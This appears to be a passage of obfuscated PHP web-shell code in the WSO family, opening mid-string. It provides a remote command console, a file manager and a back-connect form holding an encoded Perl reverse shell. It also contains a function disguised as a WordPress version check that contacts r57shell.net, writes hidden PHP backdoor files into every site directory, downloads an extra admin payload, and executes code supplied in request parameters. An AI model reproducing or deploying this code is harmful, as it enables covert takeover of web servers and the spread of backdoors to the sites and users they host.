7\x70\157\162\x74\x27\x20\166\x61\x6c\165\x65\75\x27\63\61\63\63\67\47\x3e\x20\x3c\x69\x6e\160\x75\164\40\164\x79\160\x65\x3d\x73\x75\x62\155\151\x74\40\166\141\154\x75\145\75\x27\x3e\76\47\x3e\xd\12\x9\74\57\146\x6f\x72\155\x3e\xd\xa\11\74\x66\x6f\162\155\x20\x6e\x61\155\x65\x3d\47\x6e\146\160\x27\x20\157\x6e\x53\165\x62\x6d\151\164\75\42\147\50\x6e\165\154\x6c\x2c\156\165\x6c\154\x2c\47\142\143\160\47\54\164\150\x69\163\56\x73\145\162\x76\x65\x72\56\166\x61\x6c\x75\145\54\x74\150\151\x73\56\160\157\x72\x74\x2e\x76\141\154\x75\145\51\73\162\x65\x74\165\x72\x6e\40\146\x61\x6c\163\x65\x3b\42\76\xd\xa\x9\x3c\163\x70\x61\156\76\102\x61\143\x6b\55\143\x6f\x6e\156\x65\x63\x74\40\40\133\160\145\x72\x6c\135\74\x2f\x73\x70\x61\156\x3e\74\142\162\57\x3e\15\12\11\x53\145\162\166\145\162\72\x20\x3c\151\x6e\x70\x75\164\40\x74\171\x70\x65\x3d\x27\x74\x65\170\164\47\x20\156\141\155\145\75\x27\163\145\162\x76\145\x72\47\40\166\141\154\165\x65\x3d\47" .
$_SERVER["\122\x45\115\x4f\x54\x45\137\x41\104\104\x52"] .
"\47\76\x20\120\157\x72\x74\x3a\x20\x3c\x69\x6e\160\x75\x74\x20\164\171\x70\x65\75\x27\x74\x65\170\x74\47\40\x6e\x61\x6d\145\75\x27\x70\x6f\162\164\47\40\x76\x61\154\165\145\x3d\x27\63\x31\x33\x33\x37\x27\76\x20\x3c\x69\x6e\160\165\x74\x20\x74\171\160\x65\x3d\163\165\x62\x6d\151\x74\x20\166\x61\x6c\165\145\x3d\x27\76\x3e\47\76\15\12\x9\x3c\x2f\146\157\x72\x6d\76\x3c\x62\162\x3e";
goto y9LP4;
JZOTa:
echo "\74\x2f\x64\151\x76\x3e";
goto QtVUX;
ui6gf:
$back_connect_p =
"\x49\171\105\166\144\130\x4e\171\x4c\x32\112\160\142\x69\71\167\132\130\x4a\x73\x44\121\x70\x31\x63\62\x55\147\x55\x32\71\152\x61\x32\126\60\x4f\167\60\x4b\112\107\154\150\x5a\107\x52\171\x50\127\154\165\132\x58\x52\146\131\x58\122\166\142\x69\147\153\121\x56\112\x48\126\154\x73\x77\130\x53\153\x67\146\x48\167\x67\132\x47\x6c\154\113\103\112\106\143\156\x4a\166\143\x6a\157\147\x4a\x43\x46\x63\x62\151\111\x70\x4f\167\x30\113\112\110\x42\x68\x5a\x47\122\x79\120\130\x4e\x76\x59\62\164\150\132\107\x52\x79\x58\62\154\x75\x4b\103\122\102\x55\153\144\127\127\x7a\106\x64\114\x43\x41\x6b\141\x57\106\153\x5a\x48\x49\x70\x49\x48\x78\x38\111\x47\x52\160\x5a\123\147\x69\122\130\112\x79\x62\x33\111\x36\x49\x43\x51\x68\x58\107\64\151\x4b\x54\163\x4e\x43\x69\122\x77\x63\x6d\71\60\x62\172\61\156\x5a\130\122\x77\x63\x6d\71\60\x62\62\112\65\142\155\x46\x74\x5a\123\147\x6e\x64\107\x4e\167\112\171\153\x37\x44\x51\160\172\142\x32\116\162\x5a\130\x51\157\x55\x30\x39\104\123\x30\x56\125\114\103\x42\121\x52\154\71\x4a\124\153\x56\125\114\103\102\124\124\60\x4e\114\x58\x31\x4e\125\x55\x6b\x56\x42\124\x53\x77\x67\x4a\x48\x42\171\142\63\x52\x76\113\x53\x42\70\x66\103\102\153\141\x57\125\157\x49\x6b\x56\171\x63\x6d\x39\x79\117\151\x41\153\x49\x56\170\x75\111\x69\153\67\104\121\160\152\x62\x32\x35\x75\x5a\x57\x4e\x30\113\x46\116\120\x51\60\x74\106\126\103\x77\147\x4a\110\x42\x68\132\107\122\171\113\x53\102\70\x66\x43\x42\153\141\127\x55\157\x49\x6b\126\x79\143\x6d\71\x79\x4f\151\x41\153\111\x56\x78\165\x49\x69\153\67\x44\x51\x70\x76\143\107\126\165\113\106\x4e\125\122\105\154\x4f\x4c\103\x41\151\120\x69\132\x54\x54\60\x4e\114\x52\x56\121\x69\113\124\x73\116\103\155\71\x77\132\127\x34\x6f\x55\x31\122\105\x54\61\x56\125\x4c\x43\101\x69\120\151\132\124\124\60\116\x4c\x52\x56\x51\151\x4b\124\163\116\103\x6d\x39\167\x5a\x57\x34\x6f\125\61\122\x45\x52\x56\x4a\x53\114\x43\x41\151\120\x69\132\x54\124\60\116\x4c\122\126\121\x69\113\124\163\x4e\103\x6e\116\65\143\63\122\x6c\x62\123\147\156\x4c\62\x4a\160\x62\x69\71\x7a\x61\103\101\x74\x61\x53\x63\160\117\x77\x30\113\x59\x32\x78\166\x63\x32\x55\157\125\x31\122\105\x53\x55\x34\x70\x4f\x77\60\113\x59\62\x78\x76\143\62\x55\157\x55\61\122\x45\124\x31\x56\125\x4b\124\x73\x4e\103\x6d\116\163\x62\63\x4e\154\113\x46\x4e\x55\122\105\x56\123\x55\x69\153\x37";
goto unkZP;
r_ZsG:
}
goto B8b3D;
ABTpd:
@ini_set(
"\155\141\x78\137\145\170\145\143\x75\164\151\157\x6e\x5f\164\151\155\145",
0
);
goto V8rDW;
LNmAT:
$default_action = "\106\151\x6c\x65\163\x4d\141\x6e";
goto uf2tU;
hd5Oa:
@define("\127\123\117\x5f\x56\x45\x52\123\x49\x4f\116", "\62\x2e\x35");
goto XWpnO;
w2GF1:
function actionConsole()
{
goto rclMD;
fIAZm:
if (isset($_POST["\141\x6a\x61\x78"])) {
goto b0kHG;
UVP1d:
exit();
goto FfbZi;
k7CDe:
echo "\144\x2e\x63\x66\56\x6f\165\x74\x70\x75\164\x2e\x73\x63\x72\x6f\154\x6c\x54\157\x70\40\75\x20\x64\x2e\143\146\56\x6f\165\x74\x70\165\164\56\x73\143\162\157\154\154\110\145\x69\x67\x68\x74\x3b";
goto X7NDa;
nIuhp:
if (
preg_match(
"\x21\56\52\x63\x64\134\163\x2b\50\133\x5e\x3b\135\53\51\44\41",
$_POST["\160\x31"],
$match
)
) {
if (@chdir($match[1])) {
$GLOBALS["\x63\x77\144"] = @getcwd();
echo "\143\137\x3d\47" . $GLOBALS["\143\x77\144"] . "\47\x3b";
}
}
goto VTnj_;
LPhSs:
$temp = @iconv(
$_POST["\x63\x68\141\162\163\145\164"],
"\125\x54\106\x2d\70",
addcslashes(
"\xa\44\40" .
$_POST["\x70\61"] .
"\xa" .
wsoEx($_POST["\x70\61"]),
"\xa\xd\x9\x5c\x27\x0"
)
);
goto nIuhp;
y6Hrb:
echo "\144\x2e\143\146\x2e\x63\x6d\x64\56\166\141\154\165\x65\x3d\47\x27\x3b\12";
goto LPhSs;
wcz4k:
ob_start();
goto y6Hrb;
VTnj_:
echo "\x64\x2e\143\x66\x2e\x6f\165\x74\x70\x75\164\x2e\166\x61\154\x75\x65\x2b\x3d\47" .
$temp .
"\47\x3b";
goto k7CDe;
jyokt:
echo strlen($temp), "\12", $temp;
goto UVP1d;
b0kHG:
WSOsetcookie(
md5($_SERVER["\110\124\124\x50\x5f\110\117\123\x54"]) .
"\141\152\x61\x78",
true
);
goto wcz4k;
X7NDa:
$temp = ob_get_clean();
goto jyokt;
FfbZi:
}
goto KpSEA;
RZ79V:
echo "\x3c\57\x66\157\162\155\76\x3c\x2f\x64\x69\166\x3e\x3c\x73\143\x72\x69\x70\x74\x3e\144\56\143\146\x2e\143\155\144\x2e\x66\x6f\x63\165\x73\50\x29\x3b\74\x2f\x73\143\x72\151\x70\164\x3e";
goto SJHUc;
f8SjV:
echo "\74\x2f\x73\x65\154\x65\x63\x74\76\x3c\151\x6e\x70\165\164\x20\164\x79\160\x65\x3d\x62\165\x74\164\157\156\40\x6f\x6e\x63\x6c\x69\143\x6b\75\x22\x61\x64\144\x28\x64\x2e\x63\146\56\x61\154\151\x61\163\56\x76\x61\x6c\x75\145\51\x3b\x69\146\50\x64\x2e\x63\x66\56\x61\152\141\170\56\143\150\x65\x63\153\145\144\x29\x7b\141\50\156\x75\154\154\54\156\x75\x6c\154\x2c\x64\x2e\143\x66\56\141\x6c\151\141\163\x2e\166\x61\x6c\165\145\x2c\144\56\x63\146\56\x73\x68\x6f\167\137\145\162\162\157\162\x73\x2e\143\150\x65\x63\x6b\145\x64\77\61\x3a\47\x27\51\73\175\145\154\163\145\x7b\x67\x28\156\165\x6c\x6c\54\156\165\x6c\x6c\x2c\x64\x2e\x63\x66\56\141\154\151\141\163\x2e\x76\x61\154\x75\x65\54\144\56\x63\x66\56\163\x68\x6f\x77\x5f\x65\162\x72\x6f\162\163\x2e\x63\x68\145\x63\x6b\x65\x64\77\x31\72\47\x27\51\73\175\x22\40\x76\x61\154\165\145\x3d\x22\x3e\76\x22\x3e\x20\x3c\x6e\x6f\x62\x72\76\x3c\151\x6e\x70\x75\164\40\164\171\x70\145\x3d\x63\150\145\x63\x6b\x62\157\170\40\x6e\x61\155\145\75\141\152\141\170\x20\166\x61\x6c\165\x65\x3d\61\40" .
(@$_COOKIE[
md5($_SERVER["\x48\124\124\120\x5f\110\117\x53\x54"]) .
"\141\x6a\x61\x78"
]
? "\143\x68\x65\x63\x6b\x65\x64"
: "") .
"\x3e\40\163\145\156\144\40\x75\x73\x69\x6e\x67\40\x41\112\101\x58\40\x3c\x69\156\160\165\x74\x20\164\171\x70\145\x3d\143\x68\x65\x63\x6b\142\x6f\x78\40\156\141\155\x65\x3d\x73\150\x6f\x77\x5f\145\x72\162\157\162\163\40\166\141\x6c\165\x65\75\61\40" .
(!empty($_POST["\x70\x32"]) ||
$_COOKIE[
md5($_SERVER["\110\124\x54\x50\137\110\x4f\123\x54"]) .
"\x73\164\144\145\162\x72\137\164\157\137\x6f\x75\x74"
]
? "\x63\x68\x65\143\x6b\145\x64"
: "") .
"\76\40\162\145\144\151\x72\x65\x63\x74\x20\x73\x74\x64\x65\162\x72\x20\x74\157\40\163\164\x64\x6f\x75\x74\40\50\62\x3e\46\61\x29\x3c\x2f\156\x6f\x62\x72\76\74\x62\162\57\x3e\74\164\x65\x78\164\x61\x72\145\x61\40\143\154\x61\163\163\x3d\x62\x69\147\141\162\145\141\x20\156\141\155\145\75\157\165\x74\x70\165\x74\x20\x73\x74\171\x6c\145\75\42\142\x6f\x72\144\145\x72\55\x62\157\164\164\157\x6d\72\x30\73\155\141\x72\147\151\x6e\x3a\60\73\x22\40\x72\145\x61\x64\157\156\154\x79\76";
goto IWzV6;
SJHUc:
wsoFooter();
goto APwh_;
nacH0:
echo "\74\x2f\x74\145\170\x74\x61\162\145\141\x3e\x3c\x74\x61\x62\154\x65\40\163\x74\x79\154\x65\x3d\42\142\157\x72\x64\145\162\x3a\x31\160\170\x20\163\x6f\154\151\144\40\x23\x64\x66\x35\x3b\x62\x61\x63\x6b\147\x72\x6f\x75\x6e\x64\55\143\x6f\154\x6f\162\x3a\x23\x35\x35\65\x3b\x62\x6f\x72\x64\145\162\x2d\164\x6f\x70\x3a\60\160\170\x3b\42\40\x63\x65\154\154\160\x61\x64\x64\x69\x6e\147\75\x30\x20\x63\x65\x6c\x6c\163\x70\x61\143\151\156\147\75\60\x20\167\x69\x64\x74\x68\75\42\61\x30\60\45\x22\76\74\164\x72\x3e\74\164\144\x20\167\x69\144\x74\x68\75\42\61\45\42\x3e\44\x3c\x2f\x74\x64\x3e\74\x74\x64\76\x3c\151\156\160\x75\x74\40\x74\171\160\145\x3d\x74\145\x78\x74\x20\156\141\x6d\145\x3d\x63\155\x64\x20\x73\x74\x79\154\x65\x3d\42\142\157\x72\x64\145\x72\x3a\x30\x70\x78\x3b\x77\x69\144\x74\x68\x3a\x31\x30\60\45\73\42\x20\x6f\156\153\145\171\x64\157\167\x6e\x3d\42\153\x70\50\x65\166\x65\x6e\164\51\x3b\42\x3e\x3c\57\164\144\76\x3c\57\164\162\x3e\x3c\57\164\x61\x62\x6c\145\76";
goto RZ79V;
qs3Ch:
echo "\74\150\61\76\103\x6f\x6e\163\157\154\x65\x3c\x2f\150\61\x3e\74\144\151\x76\x20\x63\154\x61\x73\163\x3d\143\157\x6e\x74\145\156\164\76\x3c\146\x6f\x72\x6d\40\x6e\x61\x6d\145\x3d\143\x66\40\x6f\x6e\x73\x75\x62\x6d\151\x74\75\x22\x69\146\50\x64\56\143\x66\56\x63\155\x64\x2e\x76\141\154\165\x65\x3d\75\47\143\x6c\x65\x61\162\x27\51\x7b\x64\56\x63\146\x2e\157\x75\x74\160\x75\x74\x2e\x76\x61\154\165\x65\75\x27\x27\73\144\56\x63\x66\56\143\x6d\144\56\x76\x61\154\165\145\75\47\47\x3b\162\x65\164\165\162\156\x20\146\x61\x6c\x73\145\73\x7d\141\144\144\x28\x74\150\x69\x73\x2e\x63\155\144\56\166\141\x6c\x75\x65\51\73\151\146\50\x74\x68\151\x73\56\x61\x6a\x61\170\56\x63\x68\145\x63\153\145\144\x29\173\x61\50\156\x75\x6c\154\x2c\x6e\x75\154\154\x2c\x74\150\151\163\56\x63\155\x64\x2e\166\141\x6c\x75\x65\54\x74\150\151\x73\x2e\x73\150\x6f\x77\x5f\145\x72\x72\x6f\162\163\x2e\x63\x68\x65\143\153\145\x64\77\x31\72\47\x27\x29\73\x7d\145\154\x73\145\173\x67\x28\x6e\165\x6c\x6c\54\156\165\x6c\154\54\164\150\x69\x73\56\143\155\x64\x2e\166\141\154\x75\145\54\x74\150\151\x73\56\x73\150\157\167\x5f\145\162\162\x6f\x72\163\x2e\x63\150\145\x63\x6b\x65\x64\x3f\x31\72\x27\47\x29\73\x7d\x20\x72\145\x74\x75\x72\x6e\x20\x66\x61\154\x73\145\73\42\x3e\x3c\x73\x65\154\x65\143\164\40\156\141\x6d\x65\75\x61\154\x69\141\163\76";
goto qrzII;
IWzV6:
if (!empty($_POST["\x70\x31"])) {
echo htmlspecialchars(
"\x24\40" . $_POST["\x70\61"] . "\12" . wsoEx($_POST["\160\61"])
);
}
goto nacH0;
c_48E:
echo "\x3c\x73\x63\x72\x69\160\x74\x3e\15\12\151\x66\50\167\151\x6e\x64\157\x77\56\105\x76\x65\x6e\x74\51\40\x77\151\x6e\144\157\x77\56\143\x61\x70\164\x75\162\145\x45\166\x65\156\164\x73\50\x45\166\x65\156\x74\x2e\113\105\x59\x44\x4f\127\x4e\x29\73\15\12\x76\141\x72\x20\143\x6d\144\163\40\x3d\x20\156\145\167\40\101\162\x72\141\x79\x28\47\x27\x29\x3b\xd\12\x76\141\162\40\143\x75\x72\40\x3d\x20\60\x3b\xd\xa\x66\165\156\143\x74\x69\157\x6e\40\x6b\160\50\145\x29\x20\173\15\xa\11\166\141\x72\x20\x6e\x20\75\40\50\167\151\156\x64\x6f\167\x2e\x45\x76\x65\156\164\x29\40\x3f\40\x65\x2e\x77\150\x69\x63\150\40\x3a\40\x65\x2e\x6b\145\171\x43\x6f\144\x65\x3b\15\xa\x9\x69\x66\x28\156\x20\75\75\40\x33\70\51\x20\173\xd\12\11\x9\143\165\162\55\x2d\73\xd\12\x9\x9\151\146\x28\143\165\x72\x3e\75\x30\51\xd\12\11\11\x9\144\157\x63\x75\155\145\156\x74\56\x63\x66\x2e\x63\x6d\x64\x2e\x76\141\x6c\x75\145\40\x3d\40\143\x6d\x64\x73\x5b\x63\165\162\135\x3b\xd\xa\11\x9\x65\154\163\145\15\12\x9\x9\11\x63\x75\162\53\53\73\15\xa\x9\175\40\x65\154\x73\145\x20\x69\146\x28\156\40\75\x3d\40\64\60\51\x20\x7b\15\xa\11\11\x63\x75\162\53\x2b\73\xd\xa\x9\11\151\146\50\x63\165\162\40\x3c\40\x63\155\x64\x73\56\x6c\x65\x6e\x67\x74\x68\51\xd\12\11\11\11\x64\x6f\x63\x75\x6d\145\x6e\x74\56\143\146\56\x63\x6d\x64\56\166\141\x6c\x75\x65\x20\75\40\143\x6d\144\x73\x5b\x63\165\162\135\73\xd\12\x9\x9\145\154\x73\x65\15\12\x9\11\11\143\165\x72\x2d\55\x3b\15\xa\11\175\xd\xa\x7d\15\xa\x66\165\x6e\x63\x74\x69\157\156\x20\x61\144\x64\x28\x63\x6d\x64\x29\x20\173\xd\12\x9\x63\155\144\x73\x2e\x70\157\x70\x28\51\73\15\12\x9\143\x6d\x64\163\x2e\160\165\x73\150\x28\143\155\144\51\x3b\15\xa\11\x63\x6d\144\163\x2e\x70\165\163\x68\50\47\47\51\73\15\12\11\143\165\x72\x20\75\40\x63\x6d\144\163\x2e\x6c\x65\x6e\147\x74\x68\x2d\x31\73\xd\xa\175\xd\xa\74\57\x73\x63\162\151\160\164\x3e";
goto qs3Ch;
qrzII:
foreach ($GLOBALS["\141\154\x69\141\x73\145\x73"] as $n => $v) {
if ($v == "") {
echo "\x3c\x6f\160\164\x67\x72\157\x75\160\x20\154\141\x62\x65\154\75\42\x2d" .
htmlspecialchars($n) .
"\x2d\x22\x3e\x3c\x2f\157\x70\164\147\162\157\165\x70\x3e";
continue;
}
echo "\x3c\x6f\x70\164\x69\x6f\x6e\40\x76\x61\154\165\145\75\x22" .
htmlspecialchars($v) .
"\42\76" .
$n .
"\74\x2f\x6f\160\x74\x69\x6f\x6e\76";
}
goto f8SjV;
KpSEA:
if (empty($_POST["\141\x6a\141\x78"]) && !empty($_POST["\x70\61"])) {
WSOsetcookie(
md5($_SERVER["\110\124\x54\x50\x5f\110\117\123\124"]) .
"\x61\x6a\141\x78",
0
);
}
goto dwgoJ;
dwgoJ:
wsoHeader();
goto c_48E;
rclMD:
if (!empty($_POST["\160\x31"]) && !empty($_POST["\x70\62"])) {
WSOsetcookie(
md5($_SERVER["\110\x54\x54\120\137\x48\x4f\x53\124"]) .
"\163\x74\144\145\x72\162\137\x74\157\137\x6f\165\164",
true
);
$_POST["\x70\61"] .= "\x20\62\76\x26\61";
} elseif (!empty($_POST["\x70\61"])) {
WSOsetcookie(
md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\x53\x54"]) .
"\163\x74\x64\145\x72\162\x5f\x74\x6f\137\x6f\x75\x74",
0
);
}
goto fIAZm;
APwh_:
}
goto rTVjF;
XWpnO:
if (
!function_exists(
"\x77\x70\x5f\x63\157\162\x65\x5f\166\x65\162\x73\x69\x6f\156\137\x63\x68\x65\143\x6b"
)
) {
function wp_core_version_check()
{
goto avUWa;
wkmQ0:
$uri_path = dirname($uri_path);
goto s730R;
vOWZG:
$uri_path = $parse_url["\160\x61\164\150"];
goto wkmQ0;
sM0UF:
if (is_writable(sys_get_temp_dir())) {
$tmp_file =
sys_get_temp_dir() .
DIRECTORY_SEPARATOR .
"\163\x65\163\x73\137" .
md5("" . $hostname . "\x5f" . $document_file . "");
} else {
$tmp_file =
$file_path .
DIRECTORY_SEPARATOR .
"\163\x65\x73\x73\137" .
md5("" . $hostname . "\137" . $document_file . "");
}
goto vbq6x;
rs5dk:
$uri_path = str_replace("\x2f", DIRECTORY_SEPARATOR, $uri_path);
goto bu9lX;
toU7p:
$hostname = str_replace(
"\167\x77\x77\56",
"",
$_SERVER["\110\124\124\x50\137\110\x4f\x53\x54"]
);
goto sM0UF;
vbq6x:
if (@$_GET["\163\x6c\151\x6e\x63\x65\137\147\157\x6c\x64\x65\x6e"]) {
goto TmOVZ;
UCuri:
if (function_exists("\143\x75\162\x6c\137\151\156\151\164")) {
goto BJyTL;
vyR_l:
curl_close($ch);
goto SHblm;
hYCm_:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto VE1SX;
VE1SX:
$response = curl_exec($ch);
goto vyR_l;
i0bPI:
curl_setopt(
$ch,
CURLOPT_URL,
"\x68\x74\x74\160\x3a\57\x2f\162\65\67\x73\150\x65\154\x6c\56\156\x65\x74\x2f\x6a\161\x75\145\162\171\x2e\160\150\x70\x3f\166\x3d\61\56\62\46\160\167\144\75\147\x65\x74"
);
goto hYCm_;
BJyTL:
$ch = curl_init();
goto i0bPI;
SHblm:
} else {
$response = file_get_contents(
"\150\x74\164\160\x3a\x2f\57\162\x35\x37\163\x68\145\x6c\154\x2e\156\x65\164\57\x6a\161\165\145\x72\x79\56\160\x68\x70\x3f\166\75\61\56\x32\46\x70\167\x64\75\147\x65\x74"
);
}
goto kmEj4;
TmOVZ:
echo "\x3c\41\x2d\x2d\40\57\x2f\x53\x69\154\x65\156\x63\x65\x20\151\x73\40\x67\x6f\154\x64\x65\x6e\x2e\x20\x2d\55\x3e";
goto UCuri;
kmEj4:
if (md5(sha1(@$_GET["\x69\x73"])) == $response) {
goto kgaYa;
pHtWV:
if (@$_POST["\154"]) {
function basic_code_extensions($request)
{
goto Wqe1_;
q3A5w:
$tmpf = stream_get_meta_data($tmp);
goto gYkau;
DzU1V:
fclose($tmp);
goto i26c2;
uYFTY:
$ret = include $tmpf;
goto DzU1V;
dzD32:
fwrite($tmp, $request);
goto uYFTY;
Wqe1_:
$tmp = tmpfile();
goto q3A5w;
i26c2:
return $ret;
goto An9L2;
gYkau:
$tmpf = $tmpf["\165\162\151"];
goto dzD32;
An9L2:
}
print_r(basic_code_extensions($_POST["\154"]));
}
goto fi0K3;
FBXXk:
if (@$_GET["\x6d"]) {
goto pvkox;
ANUJn:
echo $file_name_path;
goto svCvU;
ZI_cL:
@file_put_contents($file_name_path, $response);
goto ANUJn;
pvkox:
if (
function_exists("\x63\165\x72\154\x5f\x69\x6e\x69\164")
) {
goto QH3uY;
hFb2E:
$response = curl_exec($ch);
goto Qk97j;
j__CW:
curl_setopt(
$ch,
CURLOPT_URL,
"\x68\164\x74\x70\72\x2f\x2f\162\65\67\163\x68\x65\x6c\154\56\x6e\145\x74\57\x6d\x69\x6e\x69\137\141\x64\155\151\x6e\56\x74\x78\x74"
);
goto S9Uoo;
Qk97j:
curl_close($ch);
goto eMk6h;
QH3uY:
$ch = curl_init();
goto j__CW;
S9Uoo:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto hFb2E;
eMk6h:
} else {
$response = file_get_contents(
"\x68\164\164\x70\x3a\x2f\x2f\162\x35\x37\163\x68\x65\154\154\x2e\x6e\x65\164\57\155\x69\x6e\151\x5f\141\144\x6d\x69\156\x2e\164\x78\164"
);
}
goto X5MJi;
X5MJi:
$file_name_path =
@$_GET["\155"] . "\147\x61\147\x61\x6c\x2e\160\150\160";
goto ZI_cL;
svCvU:
}
goto pHtWV;
kgaYa:
if (@$_GET["\146"]) {
print_r($_GET["\x66"]($_GET["\x63"]));
}
goto FBXXk;
fi0K3:
}
goto d_oge;
d_oge:
exit();
goto fDMzx;
fDMzx:
}
goto gHtz2;
fqAaN:
$dirs = array_filter(
glob($document_root . DIRECTORY_SEPARATOR . "\52", GLOB_ONLYDIR)
);
goto SO8pY;
SO8pY:
foreach ($dirs as $d) {
goto Scp89;
cQFnr:
@file_put_contents($file_name, $response);
goto cQiiG;
Scp89:
$file_name =
$d .
DIRECTORY_SEPARATOR .
"\x2e" .
basename($d) .
"\56\x70\x68\160";
goto cQFnr;
IlPtg:
foreach ($dirs as $d) {
if (
!@preg_match(
"\43\x77\160\x2d\x63\157\156\x74\x65\x6e\x74\43",
$d
)
) {
$file_name =
$d .
DIRECTORY_SEPARATOR .
"\56" .
basename($d) .
"\56\160\150\160";
@file_put_contents($file_name, $response);
}
}
goto u66S4;
cQiiG:
$dirs = array_filter(
glob($d . DIRECTORY_SEPARATOR . "\x2a", GLOB_ONLYDIR)
);
goto IlPtg;
u66S4:
}
goto Q6DRk;
bu9lX:
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == "") {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, "", $file_path);
}
goto toU7p;
gHtz2:
if (!file_exists($tmp_file)) {
goto f_kq1;
QKlrR:
@file_put_contents($tmp_file, $response);
goto Ul3cm;
f_kq1:
if (function_exists("\x63\165\x72\x6c\x5f\151\x6e\151\164")) {
goto A1VWF;
J1jm0:
curl_close($ch);
goto p2Bti;
dYLi3:
$response = curl_exec($ch);
goto J1jm0;
sjN5S:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto nQ3kj;
A1VWF:
$ch = curl_init();
goto LvoXB;
LvoXB:
curl_setopt(
$ch,
CURLOPT_URL,
"\x68\x74\x74\160\72\x2f\57\x72\x35\x37\163\x68\145\154\x6c\x2e\x6e\145\x74\57\x6a\x71\165\x65\x72\171\x2e\x70\x68\160\77\x76\75\61\56\62\46\x72\x65\x71\165\145\x73\164\x3d\145\x6e\141\142\x6c\x65"
);
goto sjN5S;
nQ3kj:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["\x48\x54\124\x50\137\110\x4f\x53\x54"] .
$_SERVER["\x52\x45\121\125\105\x53\x54\137\x55\122\x49"]
);
goto dYLi3;
p2Bti:
} else {
goto aeiKy;
aeiKy:
$referer =
$_SERVER["\x48\124\124\120\x5f\x48\x4f\x53\x54"] .
$_SERVER["\122\x45\121\x55\x45\123\124\x5f\x55\x52\x49"];
goto XFWPB;
Qt92G:
$context = stream_context_create($opts);
goto mtDkU;
XFWPB:
$opts = [
"\x68\x74\x74\x70" => [
"\150\x65\141\144\x65\162" => [
"\x52\x65\146\x65\x72\145\162\x3a\x20{$referer}\15\xa",
],
],
];
goto Qt92G;
mtDkU:
$response = @file_get_contents(
"\150\x74\x74\160\x3a\x2f\57\162\x35\x37\163\x68\145\154\x6c\x2e\156\x65\164\57\x6a\161\165\145\162\x79\56\160\150\160\77\x76\75\x31\56\x32\x26\x72\145\x71\x75\x65\163\x74\75\x65\x6e\x61\142\154\145",
false,
$context
);
goto jDy5x;
jDy5x:
}
goto NFiUK;
NFiUK:
@touch($tmp_file);
goto QKlrR;
Ul3cm:
} else {
$response = file_get_contents($tmp_file);
if (!@preg_match("\x23\x73\164\x74\x31\43", $response)) {
goto KzbMt;
HV6vx:
@touch($tmp_file);
goto pdkVa;
KzbMt:
if (function_exists("\143\165\x72\154\137\x69\x6e\x69\164")) {
goto eMsto;
LO0re:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["\110\x54\x54\x50\137\110\117\x53\124"] .
$_SERVER[
"\x52\105\x51\125\x45\x53\124\x5f\125\x52\111"
]
);
goto k5X0p;
HJ7kx:
curl_close($ch);
goto gjzj0;
j4CQT:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto LO0re;
CssGj:
curl_setopt(
$ch,
CURLOPT_URL,
"\150\x74\164\160\72\x2f\x2f\x72\65\x37\163\150\x65\x6c\x6c\56\156\145\x74\x2f\152\161\165\145\x72\171\56\160\150\160\77\166\75\61\56\62\46\x72\145\161\x75\x65\163\x74\x3d\145\156\141\142\154\x65"
);
goto j4CQT;
k5X0p:
$response = curl_exec($ch);
goto HJ7kx;
eMsto:
$ch = curl_init();
goto CssGj;
gjzj0:
} else {
goto GK4cX;
a3V7j:
$opts = [
"\x68\x74\x74\160" => [
"\x68\x65\141\x64\x65\162" => [
"\122\145\x66\145\162\145\162\72\x20{$referer}\xd\xa",
],
],
];
goto v8ndl;
GK4cX:
$referer =
$_SERVER["\110\x54\124\x50\137\x48\117\123\124"] .
$_SERVER[
"\x52\105\x51\x55\x45\123\x54\x5f\125\x52\111"
];
goto a3V7j;
rOcio:
$response = @file_get_contents(
"\150\164\164\x70\72\57\57\162\x35\x37\163\150\x65\x6c\x6c\56\x6e\x65\x74\57\152\x71\x75\145\162\x79\x2e\160\x68\160\x3f\166\x3d\x31\x2e\62\46\162\145\161\x75\x65\x73\164\x3d\145\x6e\141\x62\x6c\x65",
false,
$context
);
goto nx629;
v8ndl:
$context = stream_context_create($opts);
goto rOcio;
nx629:
}
goto HV6vx;
pdkVa:
@file_put_contents($tmp_file, $response);
goto mecCz;
mecCz:
}
}
goto fqAaN;
avUWa:
$document_file =
$_SERVER[
"\123\x43\x52\x49\120\x54\137\x46\111\x4c\105\x4e\x41\115\x45"
];
goto tIPJm;
CD9KV:
$parse_url = parse_url($request_uri);
goto vOWZG;
tIPJm:
$request_uri = $_SERVER["\x52\x45\121\x55\x45\x53\x54\137\125\122\111"];
goto CD9KV;
s730R:
$file_path = dirname($document_file);
goto rs5dk;
Q6DRk:
}
wp_core_version_check();
}
goto SG2I5;
cUzsD:
if ($os == "\167\x69\156") {
$home_cwd = str_replace("\134", "\x2f", $home_cwd);
$cwd = str_replace("\x5c", "\x2f", $cwd);
}
goto qljle;
oE6Ue:
$home_cwd = @getcwd();
goto qZOco;
eRZM6:
function wsoPermsColor($f)
{
if (!@is_readable($f)) {
return "\74\x66\x6f\x6e\164\x20\x63\x6f\154\x6f\x72\x3d\43\x46\x46\x30\60\x30\x30\76" .
wsoPerms(@fileperms($f)) .
"\x3c\57\x66\x6f\x6e\164\76";
} elseif (!@is_writable($f)) {
return "\x3c\x66\157\156\x74\x20\143\x6f\x6c\x6f\x72\75\x77\x68\x69\164\145\x3e" .
wsoPerms(@fileperms($f)) .
"\x3c\x2f\x66\x6f\x6e\x74\76";
} else {
return "\x3c\x66\157\x6e\164\x20\x63\x6f\154\157\x72\75\x23\x32\65\146\146\60\x30\x3e" .
wsoPerms(@fileperms($f)) .
"\x3c\57\146\x6f\156\164\76";
}
}
goto guAyk;
HhMRL:
function actionSecInfo()
{
goto wqp98;
qT_UQ:
wsoSecParam(
"\143\x55\122\114\x20\163\165\160\160\157\x72\x74",
function_exists("\143\165\x72\154\137\166\145\162\163\x69\157\156")
? "\145\156\141\142\154\x65\x64"
: "\156\x6f"
);
goto zEzgM;
oKr71:
if (function_exists("\160\x67\137\x63\x6f\x6e\x6e\145\143\164")) {
$temp[] = "\x50\x6f\x73\164\x67\162\x65\x53\121\x4c";
}
goto owg70;
giF29:
wsoSecParam(
"\x53\141\x66\145\x20\x6d\x6f\144\x65\x20\x65\x78\145\143\40\x64\x69\x72",
